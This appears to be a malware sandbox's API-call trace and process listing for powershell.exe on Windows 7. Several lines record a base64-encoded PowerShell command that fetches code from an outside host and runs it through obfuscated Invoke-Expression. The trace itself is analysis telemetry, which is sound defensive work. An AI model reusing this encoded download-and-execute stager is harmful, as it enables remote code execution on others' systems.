	[0899.234] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7bdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0899.952] SetErrorMode (uMode=0x1) returned 0x1
	[0899.952] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell", lpFindFileData=0x1c7bde20 | out: lpFindFileData=0x1c7bde20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0899.952] SetErrorMode (uMode=0x1) returned 0x1
	[0899.952] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7bdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0899.952] SetErrorMode (uMode=0x1) returned 0x1
	[0899.952] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c7bde20 | out: lpFindFileData=0x1c7bde20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0899.953] SetErrorMode (uMode=0x1) returned 0x1
	[0899.953] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7bdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0899.953] SetErrorMode (uMode=0x1) returned 0x1
	[0899.953] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c7bde20 | out: lpFindFileData=0x1c7bde20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0899.953] SetErrorMode (uMode=0x1) returned 0x1
	[0899.954] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7bdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0899.954] SetErrorMode (uMode=0x1) returned 0x1
	[0899.954] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c7bde20 | out: lpFindFileData=0x1c7bde20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0899.954] SetErrorMode (uMode=0x1) returned 0x1
	[0899.954] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7bdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0899.954] SetErrorMode (uMode=0x1) returned 0x1
	[0899.955] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c7bde20 | out: lpFindFileData=0x1c7bde20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0899.955] SetErrorMode (uMode=0x1) returned 0x1
	[0899.955] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7bdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0899.955] SetErrorMode (uMode=0x1) returned 0x1
	[0899.955] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c7bde20 | out: lpFindFileData=0x1c7bde20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0x1b9d5040
	[0899.956] FindNextFileW (in: hFindFile=0x1b9d5040, lpFindFileData=0x1c7bde30 | out: lpFindFileData=0x1c7bde30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0
	[0899.957] FindClose (in: hFindFile=0x1b9d5040 | out: hFindFile=0x1b9d5040) returned 1
	[0899.957] SetErrorMode (uMode=0x1) returned 0x1
	[0899.958] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c7bdf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0899.958] SetErrorMode (uMode=0x1) returned 0x1
	[0899.958] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c7be150 | out: lpFileInformation=0x1c7be150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00)) returned 1
	[0899.958] SetErrorMode (uMode=0x1) returned 0x1
	[0899.959] CoTaskMemAlloc (cb=0x104) returned 0x3cf130
	[0899.959] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cf130, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0899.959] CoTaskMemFree (pv=0x3cf130) 
	[0899.961] CoTaskMemAlloc (cb=0x104) returned 0x3cf130
	[0899.961] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cf130, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0899.961] CoTaskMemFree (pv=0x3cf130) 
	[0899.964] CoTaskMemAlloc (cb=0x104) returned 0x3cf130
	[0899.964] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cf130, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0899.964] CoTaskMemFree (pv=0x3cf130) 
	[0899.974] CoTaskMemAlloc (cb=0x104) returned 0x3cf130
	[0899.974] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cf130, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0899.974] CoTaskMemFree (pv=0x3cf130) 
	[0899.989] CoTaskMemAlloc (cb=0x3b) returned 0x47d170
	[0899.989] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c7be338, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c7be338) returned 0x4550
	[0899.991] CoTaskMemFree (pv=0x47d170) 
	[0899.994] GetConsoleWindow () returned 0x1045e
	[0900.614] CoTaskMemAlloc (cb=0x104) returned 0x3cf130
	[0900.614] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cf130, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0900.615] CoTaskMemFree (pv=0x3cf130) 
	[0900.616] CoTaskMemAlloc (cb=0x104) returned 0x3cf130
	[0900.616] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3cf130, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0900.616] CoTaskMemFree (pv=0x3cf130) 
	[0900.622] CoTaskMemAlloc (cb=0x104) returned 0x3cf130
	[0900.622] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3cf130, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0900.622] CoTaskMemFree (pv=0x3cf130) 
	[0900.625] CommandLineToArgvW (in: lpCmdLine=" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", pNumArgs=0x1c7be380 | out: pNumArgs=0x1c7be380) returned 0x48fb80*=""
	[0900.626] lstrlenW (lpString="-EncodedCommand") returned 15
	[0900.627] CoTaskMemAlloc (cb=0x22) returned 0x1ba31230
	[0900.627] RtlMoveMemory (in: Destination=0x1ba31230, Source=0x48fba2, Length=0x20 | out: Destination=0x1ba31230) 
	[0900.627] CoTaskMemFree (pv=0x1ba31230) 
	[0900.627] lstrlenW (lpString="JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==") returned 376
	[0900.627] CoTaskMemAlloc (cb=0x2f4) returned 0x435ed0
	[0900.627] RtlMoveMemory (in: Destination=0x435ed0, Source=0x48fbc2, Length=0x2f2 | out: Destination=0x435ed0) 
	[0900.627] CoTaskMemFree (pv=0x435ed0) 
	[0900.628] LocalFree (hMem=0x48fb80) returned 0x0
	[0900.629] CoTaskMemAlloc (cb=0x804) returned 0x1ba3e370
	[0900.629] GetConsoleTitleW (in: lpConsoleTitle=0x1ba3e370, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0900.629] CoTaskMemFree (pv=0x1ba3e370) 
	[0900.642] CoTaskMemAlloc (cb=0x38e) returned 0x48fb80
	[0900.642] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1c7be2e0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x30206d0 | out: lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessInformation=0x30206d0*(hProcess=0x358, hThread=0x340, dwProcessId=0x2730, dwThreadId=0x2734)) returned 1
	[0900.649] CoTaskMemFree (pv=0x48fb80) 
	[0900.650] CloseHandle (hObject=0x340) returned 1
	[0900.650] CoTaskMemAlloc (cb=0x3b) returned 0x47d170
	[0900.650] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c7be388, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c7be388) returned 0x4550
	[0900.651] CoTaskMemFree (pv=0x47d170) 
	[0900.654] GetCurrentProcess () returned 0xffffffffffffffff
	[0900.654] GetCurrentProcess () returned 0xffffffffffffffff
	[0900.655] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x358, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c7be468, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c7be468*=0x340) returned 1

Process:
	id = "77"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x2809f000"
	os_pid = "0xbc4"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 356
	os_tid = 0xe48


Thread:
	id = 422
	os_tid = 0x1084


Thread:
	id = 424
	os_tid = 0x108c


Process:
	id = "78"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x20aad000"
	os_pid = "0xbb8"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 362
	os_tid = 0x514

	[0570.252] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0576.427] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0576.427] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0576.428] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0576.428] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0597.342] GetVersionExW (in: lpVersionInformation=0x1ed8c0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1ed8c0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0597.344] GetVersionExW (in: lpVersionInformation=0x1ed8c0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1ed8c0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0597.352] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0597.358] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0598.341] GetVersionExW (in: lpVersionInformation=0x1ed630*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1ed630*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0598.342] SetErrorMode (uMode=0x1) returned 0x1
	[0598.343] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x1ed790 | out: lpFileInformation=0x1ed790*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0598.344] SetErrorMode (uMode=0x1) returned 0x1
	[0598.348] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x1eda00 | out: lpdwHandle=0x1eda00) returned 0x94c
	[0598.351] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2cd72d8 | out: lpData=0x2cd72d8) returned 1
	[0598.353] VerQueryValueW (in: pBlock=0x2cd72d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1ed978, puLen=0x1ed970 | out: lplpBuffer=0x1ed978*=0x2cd7374, puLen=0x1ed970) returned 1
	[0598.356] lstrlenW (lpString="䅁") returned 1
	[0598.365] VerQueryValueW (in: pBlock=0x2cd72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x1ed8e8, puLen=0x1ed8e0 | out: lplpBuffer=0x1ed8e8*=0x2cd7450, puLen=0x1ed8e0) returned 1
	[0598.366] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0598.368] CoTaskMemAlloc (cb=0x2e) returned 0x423da0
	[0598.371] lstrcpyW (in: lpString1=0x423da0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0598.372] CoTaskMemFree (pv=0x423da0) 
	[0598.372] VerQueryValueW (in: pBlock=0x2cd72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x1ed8e8, puLen=0x1ed8e0 | out: lplpBuffer=0x1ed8e8*=0x2cd74a4, puLen=0x1ed8e0) returned 1
	[0598.372] lstrlenW (lpString="System.Management.Automation") returned 28
	[0598.372] CoTaskMemAlloc (cb=0x3c) returned 0x399860
	[0598.372] lstrcpyW (in: lpString1=0x399860, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0598.372] CoTaskMemFree (pv=0x399860) 
	[0598.372] VerQueryValueW (in: pBlock=0x2cd72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x1ed8e8, puLen=0x1ed8e0 | out: lplpBuffer=0x1ed8e8*=0x2cd7500, puLen=0x1ed8e0) returned 1
	[0598.372] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0598.372] CoTaskMemAlloc (cb=0x20) returned 0x4548b0
	[0598.372] lstrcpyW (in: lpString1=0x4548b0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0598.373] CoTaskMemFree (pv=0x4548b0) 
	[0598.373] VerQueryValueW (in: pBlock=0x2cd72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x1ed8e8, puLen=0x1ed8e0 | out: lplpBuffer=0x1ed8e8*=0x2cd7540, puLen=0x1ed8e0) returned 1
	[0598.373] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0598.373] CoTaskMemAlloc (cb=0x44) returned 0x399860
	[0598.373] lstrcpyW (in: lpString1=0x399860, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0598.373] CoTaskMemFree (pv=0x399860) 
	[0598.373] VerQueryValueW (in: pBlock=0x2cd72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x1ed8e8, puLen=0x1ed8e0 | out: lplpBuffer=0x1ed8e8*=0x2cd75a8, puLen=0x1ed8e0) returned 1
	[0598.373] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0598.373] CoTaskMemAlloc (cb=0x76) returned 0x401870
	[0598.373] lstrcpyW (in: lpString1=0x401870, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0598.373] CoTaskMemFree (pv=0x401870) 
	[0598.373] VerQueryValueW (in: pBlock=0x2cd72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x1ed8e8, puLen=0x1ed8e0 | out: lplpBuffer=0x1ed8e8*=0x2cd7644, puLen=0x1ed8e0) returned 1
	[0598.373] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0598.373] CoTaskMemAlloc (cb=0x44) returned 0x399860
	[0598.373] lstrcpyW (in: lpString1=0x399860, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0598.373] CoTaskMemFree (pv=0x399860) 
	[0598.373] VerQueryValueW (in: pBlock=0x2cd72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x1ed8e8, puLen=0x1ed8e0 | out: lplpBuffer=0x1ed8e8*=0x2cd76a8, puLen=0x1ed8e0) returned 1
	[0598.373] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0598.373] CoTaskMemAlloc (cb=0x58) returned 0x3dcce0
